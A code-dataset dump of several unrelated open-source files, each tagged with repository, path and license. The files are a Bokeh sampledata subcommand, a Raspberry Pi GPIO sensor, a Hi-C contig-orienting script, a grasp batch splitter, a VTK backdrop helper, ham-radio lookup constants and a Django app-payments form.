    main()
|
edent/BMW-i-Remote
|
python/bmw.py
|
Python
|
mit
| 4,929
|
''' Download the Bokeh sample data sets to local disk.
To download the Bokeh sample data sets, execute
.. code-block:: sh
bokeh sampledata
on the command line.
Executing this command is equivalent to running the Python code
.. code-block:: python
import bokeh.sampledata
bokeh.sampledata.download()
'''
from __future__ import absolute_import
from bokeh import sampledata
from ..subcommand import Subcommand
class Sampledata(Subcommand):
    ''' Subcommand to download bokeh sample data sets.
    '''
    #: name for this subcommand
    name = "sampledata"
    #: help text shown by the argument parser
    help = "Download the bokeh sample data sets"
    #: this subcommand takes no additional command-line arguments
    args = (
    )
    def invoke(self, args):
        ''' Download all sample data sets via ``bokeh.sampledata.download``.
        '''
        sampledata.download()
|
Karel-van-de-Plassche/bokeh
|
bokeh/command/subcommands/sampledata.py
|
Python
|
bsd-3-clause
| 736
|
#!/usr/bin/env python3
# written by sqall
# twitter: https://twitter.com/sqall01
# blog: https://h4des.org
# github: https://github.com/sqall01
#
# Licensed under the GNU Affero General Public License, version 3.
import RPi.GPIO as GPIO
import os
import time
from .core import _PollingSensor
from ..globalData import SensorDataType
from ..globalData.sensorObjects import SensorDataNone
class RaspberryPiGPIOInterruptSensor(_PollingSensor):
    """
    Uses edge detection to check a gpio pin of the raspberry pi.

    The GPIO interrupt callback only sets an internal state; the polling
    loop in _execute reports state changes and reverts the sensor back to
    normal after a configurable hold time.
    """
    def __init__(self):
        _PollingSensor.__init__(self)
        self._log_tag = os.path.basename(__file__)
        # Set sensor to not hold any data.
        self.sensorDataType = SensorDataType.NONE
        self.data = SensorDataNone()
        # the gpio pin number (NOTE: python uses the actual
        # pin number and not the gpio number)
        self.gpioPin = None
        # time that has to go by between two triggers
        self.delayBetweenTriggers = None
        # time a sensor is seen as triggered
        self.timeSensorTriggered = None
        # the last time the sensor was triggered
        self._last_time_triggered = 0.0
        # the configured edge detection (0 = falling, 1 = rising; see initialize)
        self.edge = None
        # the count of interrupts that has to occur before
        # an alert is triggered
        # this is used to relax the edge detection a little bit
        # for example an interrupt is triggered when an falling/rising
        # edge is detected, if your wiring is not good enough isolated
        # it can happen that electro magnetic radiation (because of
        # a starting vacuum cleaner for example) causes a falling/rising edge
        # this option abuses the bouncing of the wiring, this means
        # that the radiation for example only triggers one rising/falling
        # edge and your normal wiring could cause like four detected edges
        # when it is triggered because of the signal bouncing
        # so you could use this circumstance to determine correct triggers
        # from false triggers by setting a threshold of edges that have
        # to be reached before an alert is executed
        self.edgeCountBeforeTrigger = 0
        self._edge_counter = 0
        # configures if the gpio input is pulled up or down (0 = down, 1 = up)
        self.pulledUpOrDown = None
        # used as internal state set by the interrupt callback
        self._internal_state = None
    def _execute(self):
        """Sensor thread loop: reverts a triggered sensor back to normal
        after timeSensorTriggered seconds and raises a sensor alert on
        every observed state change."""
        while True:
            if self._exit_flag:
                return
            time.sleep(0.5)
            # Check if the sensor is triggered and if it is longer triggered than configured
            # => set internal state to normal
            utc_timestamp = int(time.time())
            if (self.state == self.triggerState
                    and ((utc_timestamp - self._last_time_triggered) > self.timeSensorTriggered)):
                self._internal_state = 1 - self.triggerState
            if self.state != self._internal_state:
                self._add_sensor_alert(self._internal_state,
                                       True)
    def _interrupt_callback(self, gpioPin: int):
        """GPIO edge-detection callback (runs in the RPi.GPIO thread);
        counts edges and marks the sensor as triggered once the configured
        edge threshold is reached."""
        # Check if the last time we detected an interrupt is longer ago than the configured delay between two triggers
        # => set time and reset edge counter
        utc_timestamp = int(time.time())
        if (utc_timestamp - self._last_time_triggered) > self.delayBetweenTriggers:
            self._edge_counter = 0
            self._last_time_triggered = utc_timestamp
        self._edge_counter += 1
        self._log_debug(self._log_tag, "%d Interrupt for sensor triggered." % self._edge_counter)
        # if edge counter reaches threshold
        # => trigger state
        if self._edge_counter >= self.edgeCountBeforeTrigger:
            self._internal_state = self.triggerState
            self._log_debug(self._log_tag, "Sensor triggered.")
    def initialize(self) -> bool:
        """Configure the GPIO pin and register edge detection; returns
        False on unknown pull-up/down or edge configuration values."""
        # Get the value for the setting if the gpio is pulled up or down.
        if self.pulledUpOrDown == 0:
            pulledUpOrDown = GPIO.PUD_DOWN
        elif self.pulledUpOrDown == 1:
            pulledUpOrDown = GPIO.PUD_UP
        else:
            self._log_critical(self._log_tag, "Value for pulled up or down setting not known.")
            return False
        # Configure gpio pin and get initial state.
        GPIO.setmode(GPIO.BOARD)
        GPIO.setup(self.gpioPin, GPIO.IN, pull_up_down=pulledUpOrDown)
        # set initial state to not triggered
        self.state = 1 - self.triggerState
        self._internal_state = 1 - self.triggerState
        # set edge detection (0 = falling edge, 1 = rising edge)
        if self.edge == 0:
            GPIO.add_event_detect(self.gpioPin,
                                  GPIO.FALLING,
                                  callback=self._interrupt_callback)
        elif self.edge == 1:
            GPIO.add_event_detect(self.gpioPin,
                                  GPIO.RISING,
                                  callback=self._interrupt_callback)
        else:
            self._log_critical(self._log_tag, "Value for edge detection not known.")
            return False
        return True
|
sqall01/alertR
|
sensorClientRaspberryPi/lib/sensor/interrupt.py
|
Python
|
agpl-3.0
| 5,191
|
# Main script for orienting
# Modules in orienting_mods.py which could be moved to triangulation.py later
# Example:
# python orienting.py -in Dixon12_hESC-AllpathsLGcontigs.tab -out results -pos contigs_pos.tab -real_ori contig_orientations.tab
########################################################################################################################
import orienting_mods
import triangulation
import numpy as np
import sys
import argparse
import matplotlib.pyplot as plt
def main():
    """Orient contigs within a chromosome from a Hi-C interaction matrix.

    Reads the interaction matrix and contig positions, builds a weighted
    DAG of pairwise orientation scores, finds the best orientation via a
    shortest path, writes the predictions, and (optionally) evaluates
    accuracy against known orientations at varying confidence, contig-size
    and gap-size thresholds, saving one plot per analysis.
    (Python 2 code — note the print statement below.)
    """
    parser = argparse.ArgumentParser(description = 'Orient contigs within chromosome given interaction matrix.', formatter_class = argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-in', help = 'interaction frequency matrix file', dest = 'in_file', type = str, required = True)
    parser.add_argument('-out', help = 'out file prefix', dest = 'out_file', type = str, required = True)
    parser.add_argument('-pos', help = 'file with contig positions. "contig\tstart\tend"', dest = 'pos_file', type = str, required = True)
    parser.add_argument('-real_ori', help = 'file with real orientations. "contig\tsign"', dest = 'real_ori_file', type = str, default = None)
    args = parser.parse_args()
    in_file = args.in_file
    out_file = args.out_file
    pos_file = args.pos_file
    real_ori_file = args.real_ori_file
    # Read contig interacion file
    d, bin_chr, bin_position = triangulation.load_data_txt(in_file, remove_nans = True)
    # Read contig pos file into dictionary
    ID_col = 0
    start_col = 1
    end_col = 2
    IDs = []
    starts = []
    ends = []
    pos_fh = open(pos_file, 'r')
    for line in pos_fh:
        contig_line = line.split()
        IDs.append(contig_line[ID_col])
        starts.append(float(contig_line[start_col]))
        ends.append(float(contig_line[end_col]))
    pos_fh.close()
    # Create position dictionary for downstream analysis
    pos_dic = orienting_mods.make_pos_dic(IDs, starts, ends)
    # Sort contigs by their positions
    sorted_contigs_extra = orienting_mods.sort_by_pos(IDs, starts)
    # Use only contigs that are in interaction matrix
    sorted_contigs = []
    for contig in sorted_contigs_extra:
        if contig in bin_chr:
            sorted_contigs.append(contig)
    # Calculate bin centers
    bin_center = np.mean(bin_position, axis = 1)
    # Calculate the 4 orientation scores (edge wights) between each pair of contigs
    # Return the weighted directed acyclic graph object
    WDAG = orienting_mods.make_WDAG(d, bin_chr, bin_position, bin_center, sorted_contigs)
    # Create sorted node list for input into shortest_path function
    node_list = orienting_mods.sorted_nodes(sorted_contigs)
    # Find shortest path through WDAG
    orientation_results = orienting_mods.shortest_path(WDAG, node_list)
    # Create output file for predicted orientations
    OUT = open(out_file + '_pred_ori.txt', 'w+')
    # Remove start and end node from orientation result list
    orientation_results.remove("start")
    orientation_results.remove("end")
    # Format output results (Note contigs with single-bins default to forward)
    # Each node is named "<contig>_fw" or "<contig>_rc"; strip the suffix
    # and emit "+" / "-" accordingly.
    for contig in orientation_results:
        contig_ID = contig[:-3]
        orientation = contig[-2:]
        if orientation == "fw":
            orientation = "+"
        elif orientation == "rc":
            orientation = "-"
        else:
            print "Error in formatting output!"
        OUT.write(contig_ID + "\t" + orientation + "\n")
    OUT.close()
    if real_ori_file != None:
        # Open true orientation data to test results against
        true_fh = open(real_ori_file, 'r')
        ID_col = 0
        orient_col = 1
        true_dic = {}
        for line in true_fh:
            contig_line = line.split()
            contig_ID = contig_line[ID_col]
            orientation = contig_line[orient_col]
            true_dic[contig_ID] = orientation
        true_fh.close()
        # Record accuracy of prediction at different confidence thesholds
        # Get max confidence
        max_conf = orienting_mods.get_max_conf(WDAG, sorted_contigs)
        thresholds = np.arange(0.0, max_conf, max_conf/200.0)
        accuracy_list = []
        # Record percent of contigs removed
        percent_removed = []
        for threshold in thresholds:
            poor_conf = orienting_mods.poor_confidence(WDAG, sorted_contigs, threshold)
            percent_removed.append(float(len(poor_conf))/float(len(sorted_contigs)))
            # Calculate sensitivity, specificity, and accuracy such that fw is (+) and rc is (-)
            # Accuracy will be percent of orientations correctly predicted out of total contig orientations
            # Create prediction dictionary for orientation results
            pred_dic = orienting_mods.make_pred_dic(orientation_results, poor_conf)
            # Need to remove all contigs from true dictionary that are not in our prediction dictionary
            adj_true_dic = orienting_mods.adjust_true_dic(true_dic, pred_dic)
            # Calculate stats
            P, N, TP, TN, accuracy = orienting_mods.calc_stats(adj_true_dic, pred_dic)
            accuracy_list.append(accuracy)
        # Plot results: accuracy (left axis) vs fraction removed (right axis)
        y_bottom = min(accuracy_list + percent_removed)
        fig, ax1 = plt.subplots()
        ax1.plot(thresholds, accuracy_list)
        ax1.set_xlabel("Confidence threshold")
        ax1.set_title("Accuracy vs Confidence")
        ax1.set_ylim(y_bottom-0.1, 1.0)
        ax1.set_ylabel("Accuracy", color = 'b')
        for t1 in ax1.get_yticklabels():
            t1.set_color('b')
        ax2 = ax1.twinx()
        ax2.plot(thresholds, percent_removed, 'r-')
        ax2.set_ylabel("Percent contigs removed", color = 'r')
        ax2.ticklabel_format(style = 'sci', axis = 'x', scilimits = (0, 0))
        ax2.set_ylim(y_bottom-0.1, 1.0)
        for t1 in ax2.get_yticklabels():
            t1.set_color('r')
        plt.savefig(out_file + '_acc_conf_plot.png')
        # Record accuracy of prediction at different contig size thresholds
        # Get max contig length of all contigs with positions
        max_length = orienting_mods.get_max_length(bin_chr, bin_position, sorted_contigs)
        contig_lengths = np.arange(0.0, max_length, max_length/200.0)
        accuracy_list = []
        percent_removed = []
        for contig_length in contig_lengths:
            # Get all contigs with length < = length of threshold
            small_contigs = orienting_mods.get_small_contigs(bin_chr, bin_position, sorted_contigs, contig_length)
            # Add all single bin/score zero contigs to list of contigs to be removed
            score_zeros = orienting_mods.poor_confidence(WDAG, sorted_contigs, 0.0)
            remove_contigs = list(set(small_contigs).union(set(score_zeros)))
            percent_removed.append(float(len(remove_contigs))/float(len(sorted_contigs)))
            pred_dic = orienting_mods.make_pred_dic(orientation_results, remove_contigs)
            # Need to remove all contigs from true dictionary that are not in our prediction dictionary
            adj_true_dic = orienting_mods.adjust_true_dic(true_dic, pred_dic)
            # Calculate stats
            P, N, TP, TN, accuracy = orienting_mods.calc_stats(adj_true_dic, pred_dic)
            accuracy_list.append(accuracy)
        # Plot results
        y_bottom = min(accuracy_list + percent_removed)
        fig, ax1 = plt.subplots()
        ax1.plot(contig_lengths, accuracy_list)
        ax1.set_xlabel("Contig length threshold")
        ax1.set_title("Accuracy vs Contig Length")
        ax1.set_ylim(y_bottom-0.1, 1.0)
        ax1.set_ylabel("Accuracy", color = 'b')
        for t1 in ax1.get_yticklabels():
            t1.set_color('b')
        ax2 = ax1.twinx()
        ax2.plot(contig_lengths, percent_removed, 'r-')
        ax2.set_ylabel("Percent contigs removed", color = 'r')
        ax2.ticklabel_format(style = 'sci', axis = 'x', scilimits = (0, 0))
        ax2.set_ylim(y_bottom-0.1, 1.0)
        for t1 in ax2.get_yticklabels():
            t1.set_color('r')
        plt.savefig(out_file + '_acc_size_plot.png')
        # Record accuracy of prediction at different gap size thresholds
        # Get max gap size between all contigs and min gap size between all contigs
        max_gap, min_gap = orienting_mods.get_max_min_gap(sorted_contigs, pos_dic)
        gap_lengths = np.arange(max_gap, min_gap, -max_gap/200.0)
        accuracy_list = []
        percent_removed = []
        for gap_length in gap_lengths:
            # Get all contigs with gap size > = gap of threshold
            big_gaps = orienting_mods.get_big_gaps(pos_dic, sorted_contigs, gap_length)
            # NOTE(review): score_zeros here is the value left over from the
            # last iteration of the previous (contig-length) loop — confirm
            # that reuse is intended rather than recomputing it.
            remove_contigs = list(set(big_gaps).union(set(score_zeros)))
            percent_removed.append(float(len(remove_contigs))/float(len(sorted_contigs)))
            pred_dic = orienting_mods.make_pred_dic(orientation_results, remove_contigs)
            adj_true_dic = orienting_mods.adjust_true_dic(true_dic, pred_dic)
            # Calculate stats
            P, N, TP, TN, accuracy = orienting_mods.calc_stats(adj_true_dic, pred_dic)
            accuracy_list.append(accuracy)
        # Plot results (x axis reversed: large gaps on the left)
        y_bottom = min(accuracy_list + percent_removed)
        fig, ax1 = plt.subplots()
        ax1.plot(gap_lengths, accuracy_list)
        ax1.set_xlabel("Gap length threshold")
        ax1.set_title("Accuracy vs Gap Length")
        ax1.set_ylim(y_bottom-0.1, 1.0)
        ax1.set_ylabel("Accuracy", color = 'b')
        for t1 in ax1.get_yticklabels():
            t1.set_color('b')
        ax2 = ax1.twinx()
        ax2.plot(gap_lengths, percent_removed, 'r-')
        ax2.set_ylabel("Percent contigs removed", color = 'r')
        ax2.ticklabel_format(style = 'sci', axis = 'x', scilimits = (0, 0))
        ax2.set_ylim(y_bottom-0.1, 1.0)
        ax2.invert_xaxis()
        for t1 in ax2.get_yticklabels():
            t1.set_color('r')
        plt.savefig(out_file + '_acc_gaps_plot.png')
if __name__ == "__main__":
    main()
|
lpryszcz/HiCembler
|
.dna-triangulation/orienting.py
|
Python
|
gpl-3.0
| 9,214
|
#!/usr/bin/env python
from mvbb.box_db import MVBBLoader
import multiprocessing, subprocess
from multiprocessing import Pool
import sys
from plugins import soft_hand
def grasp_boxes(filename):
    """Run the batch grasp script on *filename* in a child Python process."""
    command = ['python', './grasp_boxes_batch.py', filename]
    subprocess.call(command)
if __name__ == '__main__':
    # Derive the database base name from argv[1] with its extension
    # stripped; fall back to 'box_db' when no argument was supplied.
    try:
        import os.path
        filename = os.path.splitext(sys.argv[1])[0]
    except:
        filename = 'box_db'
    if not os.path.isfile(filename+'.csv'):
        # NOTE: Python 2 print statement -- this script predates Python 3.
        print "Error: file", filename, "doesn't exist"
        exit()
    # Optional CLI overrides for the hand model dimensions; default to the
    # SoftHand plugin's joint/link counts.
    try:
        n_dofs = int(sys.argv[2])
        n_l = int(sys.argv[3])
    except:
        n_dofs = soft_hand.numJoints
        n_l = len(soft_hand.links_to_check)
    # for SoftHand
    box_db = MVBBLoader(filename, n_dofs, n_l)
    # Split the database into per-worker files, grasp each split in a
    # separate process (one per CPU core), then merge the results back.
    filenames = box_db.split_db()
    p = Pool(multiprocessing.cpu_count())
    p.map(grasp_boxes, filenames)
    box_db.join_results(filenames)
|
lia2790/grasp_learning
|
python/simple_batch_splitter.py
|
Python
|
bsd-3-clause
| 913
|
"""this is python equivalent of ./Wrapping/Tcl/vtktesting/backdrop.tcl
This script is used while running python tests translated from Tcl."""
import vtk
# Module-level cache: BuildBackdrop() creates these VTK objects once and
# reuses them on later calls, so tests share a single set of backdrop actors.
basePlane = None
baseMapper = None
base = None
backPlane = None
backMapper = None
back = None
leftPlane = None
leftMapper = None
left = None
def BuildBackdrop (minX, maxX, minY, maxY, minZ, maxZ, thickness):
    """Return the three backdrop actors [base, back, left].

    The cube sources, mappers and actors are cached in module globals:
    they are allocated on the first call and only re-positioned on
    subsequent calls.
    """
    global basePlane, baseMapper, base
    global backPlane, backMapper, back
    global left, leftPlane, leftMapper
    midX = (maxX + minX)/2.0
    midY = (maxY + minY)/2.0
    midZ = (maxZ + minZ)/2.0
    # Floor: thin slab spanning X/Z at y == minY.
    if basePlane is None:
        basePlane = vtk.vtkCubeSource()
    basePlane.SetCenter(midX, minY, midZ)
    basePlane.SetXLength(maxX-minX)
    basePlane.SetYLength(thickness)
    basePlane.SetZLength(maxZ - minZ)
    if baseMapper is None:
        baseMapper = vtk.vtkPolyDataMapper()
        baseMapper.SetInputConnection(basePlane.GetOutputPort())
    if base is None:
        base = vtk.vtkActor()
        base.SetMapper(baseMapper)
    # Back wall: thin slab spanning X/Y at z == minZ.
    if backPlane is None:
        backPlane = vtk.vtkCubeSource()
    backPlane.SetCenter(midX, midY, minZ)
    backPlane.SetXLength(maxX-minX)
    backPlane.SetYLength(maxY - minY)
    backPlane.SetZLength(thickness)
    if backMapper is None:
        backMapper = vtk.vtkPolyDataMapper()
        backMapper.SetInputConnection(backPlane.GetOutputPort())
    if back is None:
        back = vtk.vtkActor()
        back.SetMapper(backMapper)
    # Left wall: thin slab spanning Y/Z at x == minX.
    if leftPlane is None:
        leftPlane = vtk.vtkCubeSource()
    leftPlane.SetCenter(minX, midY, midZ)
    leftPlane.SetXLength(thickness)
    leftPlane.SetYLength(maxY-minY)
    leftPlane.SetZLength(maxZ-minZ)
    if leftMapper is None:
        leftMapper = vtk.vtkPolyDataMapper()
        leftMapper.SetInputConnection(leftPlane.GetOutputPort())
    if left is None:
        left = vtk.vtkActor()
        left.SetMapper(leftMapper)
    return [base, back, left]
|
cjh1/vtkmodular
|
Utilities/vtkTclTest2Py/backdrop.py
|
Python
|
bsd-3-clause
| 1,927
|
class LookupConventions:
    """ This class defines the constants used within the pyhamtools package """
    # These are dictionary-key constants; the u"" prefixes matter on
    # Python 2 (unicode vs. byte strings) and must not be changed.
    # Mostly specific to Clublog XML File
    CALLSIGN = u"callsign"
    COUNTRY = u"country"
    PREFIX = u"prefix"
    ADIF = u"adif"
    CQZ = u"cqz"
    ITUZ = u"ituz"
    CONTINENT = u"continent"
    LATITUDE = u"latitude"
    LONGITUDE = u"longitude"
    START = u"start"
    END = u"end"
    WHITELIST = u"whitelist"
    WHITELIST_START = u"whitelist_start"
    WHITELIST_END = u"whitelist_end"
    DELETED = u"deleted"
    MARITIME_MOBILE = u"mm"
    AIRCRAFT_MOBILE = u"am"
    LOCATOR = u"locator"
    BEACON = u"beacon"
    #CQ / DIGITAL Skimmer specific
    SKIMMER = u"skimmer"
    FS = u"fs" #fieldstrength
    WPM = u"wpm" #words / bytes per second
    CQ = u"cq"
    NCDXF = u"ncdxf"
    # Modes
    CW = u"CW"
    USB = u"USB"
    LSB = u"LSB"
    DIGITAL = u"DIGITAL"
    FM = u"FM"
    # FT8 = u'FT8'
    #DX Spot
    SPOTTER = u"spotter"
    DX = u"dx"
    FREQUENCY = u"frequency"
    COMMENT = u"comment"
    TIME = u"time"
    BAND = u"band"
    MODE = u"mode"
    #DX Spider specific
    ORIGIN_NODE = u"node"
    HOPS = u"hops"
    RAW_SPOT = u"raw"
    IP = u"ip"
    ROUTE = u"route"
    TEXT = u"text"
    SYSOP_FLAG = u"sysop_flag"
    WX_FLAG = u"wx_flag"
    #WWV & WCY
    STATION = u"station"
    R = u"r"
    K = u"k"
    EXPK = u"expk"
    SFI = u"sfi"
    A = u"a"
    AURORA = u"aurora"
    SA = u"sa"
    GMF = u"gmf"
    FORECAST = u"forecast"
    #QRZ.com
    XREF = u"xref"
    ALIASES = u"aliases"
    FNAME = u"fname"
    NAME = u"name"
    ADDR1 = u"addr1"
    ADDR2 = u"addr2"
    STATE = u"state"
    ZIPCODE = u"zipcode"
    CCODE = u"ccode"
    COUNTY = u"county"
    FIPS = u"fips"
    LAND = u"land"
    EFDATE = u"efdate"
    EXPDATE = u"expdate"
    P_CALL = u"p_call"
    LICENSE_CLASS = u"license_class"
    CODES = u"codes"
    QSLMGR = u"qslmgr"
    EMAIL = u"email"
    URL = u"url"
    U_VIEWS = u"u_views"
    BIO = u"bio"
    BIODATE = u"biodate"
    IMAGE = u"image"
    IMAGE_INFO = u"imageinfo"
    SERIAL = u"serial"
    MODDATE = u"moddate"
    # NOTE(review): the constants below lack the u"" prefix, unlike the rest
    # of the class -- presumably harmless on Python 3, but inconsistent on
    # Python 2; confirm before relying on byte/unicode distinctions.
    MSA = "msa"
    AREACODE = "areacode"
    TIMEZONE = "timezone"
    GMTOFFSET = "gmtoffset"
    DST = "dst"
    EQSL = "eqsl"
    MQSL = "mqsl"
    LOTW = "lotw"
    BORN = "born"
    USER_MGR = "user"
    IOTA = "iota"
    GEOLOC = "geoloc"
|
dh1tw/pyhamtools
|
pyhamtools/consts.py
|
Python
|
mit
| 2,368
|
from decimal import Decimal
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms.fields import Field
from django.forms.formsets import formset_factory, BaseFormSet
import commonware
import happyforms
from slumber.exceptions import HttpClientError
from tower import ugettext as _, ugettext_lazy as _lazy
import mkt
from lib.pay_server import client
from mkt.api.forms import SluggableModelChoiceField
from mkt.constants import (BANGO_COUNTRIES, BANGO_OUTPAYMENT_CURRENCIES,
FREE_PLATFORMS, PAID_PLATFORMS)
from mkt.constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR)
from mkt.developers.models import AddonPaymentAccount, PaymentAccount
from mkt.prices.models import AddonPremium, Price
from mkt.reviewers.models import RereviewQueue
from mkt.site.forms import AddonChoiceField
from mkt.submit.forms import DeviceTypeForm
from mkt.webapps.models import AddonUpsell, Webapp
log = commonware.log.getLogger('z.devhub')
def _restore_app_status(app, save=True):
    """
    Restore an incomplete app to its former status. The app will be marked
    as its previous status or PENDING if it was never reviewed.
    """
    log.info('Changing app from incomplete to previous status: %d' % app.pk)
    previous = app.highest_status
    if previous == mkt.STATUS_NULL:
        previous = mkt.STATUS_PENDING
    app.status = previous
    if save:
        app.save()
class PremiumForm(DeviceTypeForm, happyforms.Form):
    """
    The premium details for an addon, which is unfortunately
    distributed across a few models.
    """
    # This does a nice Yes/No field like the mockup calls for.
    allow_inapp = forms.ChoiceField(
        choices=((True, _lazy(u'Yes')), (False, _lazy(u'No'))),
        widget=forms.RadioSelect, required=False)
    # Choices are provided at init by group_tier_choices.
    price = forms.ChoiceField(choices=(), label=_lazy(u'App Price'),
                              required=False)

    def __init__(self, *args, **kw):
        # Pops request/addon/user off kwargs before Django's Form sees them.
        self.request = kw.pop('request')
        self.addon = kw.pop('addon')
        self.user = kw.pop('user')
        kw['initial'] = {
            'allow_inapp': self.addon.premium_type in mkt.ADDON_INAPPS
        }
        if self.addon.premium_type == mkt.ADDON_FREE_INAPP:
            kw['initial']['price'] = 'free'
        elif self.addon.premium and self.addon.premium.price:
            # If the app has a premium object, set the initial price.
            kw['initial']['price'] = self.addon.premium.price.pk
        super(PremiumForm, self).__init__(*args, **kw)
        self.fields['paid_platforms'].choices = PAID_PLATFORMS(self.request)
        self.fields['free_platforms'].choices = FREE_PLATFORMS()
        if (self.is_paid() and not self.is_toggling()):
            # Require the price field if the app is premium and
            # we're not toggling from free <-> paid.
            self.fields['price'].required = True
        # Get the list of supported devices and put them in the data.
        self.device_data = {}
        supported_devices = [mkt.REVERSE_DEVICE_LOOKUP[dev.id] for dev in
                             self.addon.device_types]
        self.initial.setdefault('free_platforms', [])
        self.initial.setdefault('paid_platforms', [])
        # Mirror the app's current device support into both the free-* and
        # paid-* checkbox groups so the template can render either set.
        for platform in set(x[0].split('-', 1)[1] for x in
                            (FREE_PLATFORMS() + PAID_PLATFORMS(self.request))):
            supported = platform in supported_devices
            self.device_data['free-%s' % platform] = supported
            self.device_data['paid-%s' % platform] = supported
            if supported:
                self.initial['free_platforms'].append('free-%s' % platform)
                self.initial['paid_platforms'].append('paid-%s' % platform)
        if not self.initial.get('price'):
            self.initial['price'] = self._initial_price_id()
        self.fields['price'].choices = self.group_tier_choices()

    def group_tier_choices(self):
        """Creates tier choices with optgroups based on payment methods"""
        price_choices = [
            ('free', _('Free (with in-app payments)')),
        ]
        card_billed = []
        operator_billed = []
        card_and_operator_billed = []
        for price in Price.objects.active():
            choice = (price.pk, unicode(price))
            # Special case price tier 0.
            if price.price == Decimal('0.00'):
                price_choices.append((price.pk, '%s (%s)' %
                                      (unicode(price),
                                       _('Promotional Pricing'))))
            # Tiers that can only be operator billed.
            elif price.method == PAYMENT_METHOD_OPERATOR:
                operator_billed.append(choice)
            # Tiers that can only be card billed.
            elif price.method == PAYMENT_METHOD_CARD:
                card_billed.append(choice)
            # Tiers that are can generally be billed by either
            # operator or card.
            elif price.method == PAYMENT_METHOD_ALL:
                card_and_operator_billed.append(choice)
        if operator_billed:
            price_choices.append((_lazy('Only supports carrier billing'),
                                  operator_billed))
        if card_billed:
            price_choices.append((_lazy('Only supports credit-card billing'),
                                  card_billed))
        if card_and_operator_billed:
            price_choices.append(
                (_lazy('Supports all billing methods'),
                 card_and_operator_billed))
        return price_choices

    def _initial_price_id(self):
        """Sets the inital price tier if available."""
        try:
            return Price.objects.active().get(price='0.99').id
        except Price.DoesNotExist:
            log.warning('Could not find a price tier 0.99 to set as default.')
            return None

    def _make_premium(self):
        """Return the addon's AddonPremium, creating an unsaved one if absent."""
        if self.addon.premium:
            return self.addon.premium
        log.info('New AddonPremium object for addon %s' % self.addon.pk)
        self.addon._premium = AddonPremium(addon=self.addon,
                                           price_id=self._initial_price_id())
        return self.addon._premium

    def is_paid(self):
        """True for premium apps and for free apps with in-app payments."""
        is_paid = (self.addon.premium_type in mkt.ADDON_PREMIUMS or
                   self.is_free_inapp())
        return is_paid

    def is_free_inapp(self):
        """True when the app is free but has in-app payments enabled."""
        return self.addon.premium_type == mkt.ADDON_FREE_INAPP

    def is_toggling(self):
        """Return 'free'/'paid' when the POST toggles payment mode, else False."""
        value = self.request.POST.get('toggle-paid')
        return value if value in ('free', 'paid') else False

    def clean(self):
        is_toggling = self.is_toggling()
        if not is_toggling:
            # If a platform wasn't selected, raise an error.
            if not self.cleaned_data[
                    '%s_platforms' % ('paid' if self.is_paid() else 'free')]:
                self._add_error('none')
                # We want to throw out the user's selections in this case and
                # not update the <select> element that goes along with this.
                # I.e.: we don't want to re-populate these big chunky
                # checkboxes with bad data.
                # Also, I'm so, so sorry.
                self.data = dict(self.data)
                platforms = dict(
                    free_platforms=self.initial.get('free_platforms', []),
                    paid_platforms=self.initial.get('paid_platforms', []))
                self.data.update(**platforms)
        return self.cleaned_data

    def clean_price(self):
        """Validate the selected price tier; returns a Price, 'free', or None."""
        price_value = self.cleaned_data.get('price')
        premium_type = self.cleaned_data.get('premium_type')
        if ((premium_type in mkt.ADDON_PREMIUMS or
             premium_type == mkt.ADDON_FREE_INAPP) and
                not price_value and not self.is_toggling()):
            raise ValidationError(Field.default_error_messages['required'])
        if not price_value and self.fields['price'].required is False:
            return None
        # Special case for a free app - in-app payments must be enabled.
        # Note: this isn't enforced for tier zero apps.
        if price_value == 'free':
            if self.cleaned_data.get('allow_inapp') != 'True':
                raise ValidationError(_('If app is Free, '
                                        'in-app payments must be enabled'))
            return price_value
        try:
            price = Price.objects.get(pk=price_value, active=True)
        except (ValueError, Price.DoesNotExist):
            raise ValidationError(_('Not a valid choice'))
        return price

    def save(self):
        """Persist premium-type/price changes and device compatibility."""
        toggle = self.is_toggling()
        upsell = self.addon.upsold
        # is_paid is true for both premium apps and free apps with
        # in-app payments.
        is_paid = self.is_paid()
        if toggle == 'paid' and self.addon.premium_type == mkt.ADDON_FREE:
            # Toggle free apps to paid by giving them a premium object.
            premium = self._make_premium()
            premium.price_id = self._initial_price_id()
            premium.save()
            self.addon.premium_type = mkt.ADDON_PREMIUM
            self.addon.status = mkt.STATUS_NULL
            is_paid = True
        elif toggle == 'free' and is_paid:
            # If the app is paid and we're making it free, remove it as an
            # upsell (if an upsell exists).
            upsell = self.addon.upsold
            if upsell:
                log.debug('[1@%s] Removing upsell; switching to free' %
                          self.addon.pk)
                upsell.delete()
            log.debug('[1@%s] Removing app payment account' % self.addon.pk)
            AddonPaymentAccount.objects.filter(addon=self.addon).delete()
            log.debug('[1@%s] Setting app premium_type to FREE' %
                      self.addon.pk)
            self.addon.premium_type = mkt.ADDON_FREE
            # Remove addonpremium
            try:
                log.debug('[1@%s] Removing addon premium' % self.addon.pk)
                self.addon.addonpremium.delete()
            except AddonPremium.DoesNotExist:
                pass
            if (self.addon.has_incomplete_status() and
                    self.addon.is_fully_complete()):
                _restore_app_status(self.addon, save=False)
            is_paid = False
        # Right is_paid is both paid apps and free with in-app payments.
        elif is_paid:
            price = self.cleaned_data.get('price')
            # If price is free then we want to make this an app that's
            # free with in-app payments.
            if price == 'free':
                self.addon.premium_type = mkt.ADDON_FREE_INAPP
                log.debug('[1@%s] Changing to free with in_app'
                          % self.addon.pk)
                # Remove upsell
                upsell = self.addon.upsold
                if upsell:
                    log.debug('[1@%s] Removing upsell; switching to free '
                              'with in_app' % self.addon.pk)
                    upsell.delete()
                # Remove addonpremium
                try:
                    log.debug('[1@%s] Removing addon premium' % self.addon.pk)
                    self.addon.addonpremium.delete()
                except AddonPremium.DoesNotExist:
                    pass
            else:
                # The dev is submitting updates for payment data about a paid
                # app. This might also happen if he/she is associating a new
                # paid app with an existing bank account.
                premium = self._make_premium()
                self.addon.premium_type = (
                    mkt.ADDON_PREMIUM_INAPP if
                    self.cleaned_data.get('allow_inapp') == 'True' else
                    mkt.ADDON_PREMIUM)
                if price and price != 'free':
                    log.debug('[1@%s] Updating app price (%s)' %
                              (self.addon.pk, self.cleaned_data['price']))
                    premium.price = self.cleaned_data['price']
                    premium.save()
        if not toggle:
            # Save the device compatibility information when we're not
            # toggling.
            super(PremiumForm, self).save(self.addon, is_paid)
        log.info('Saving app payment changes for addon %s.' % self.addon.pk)
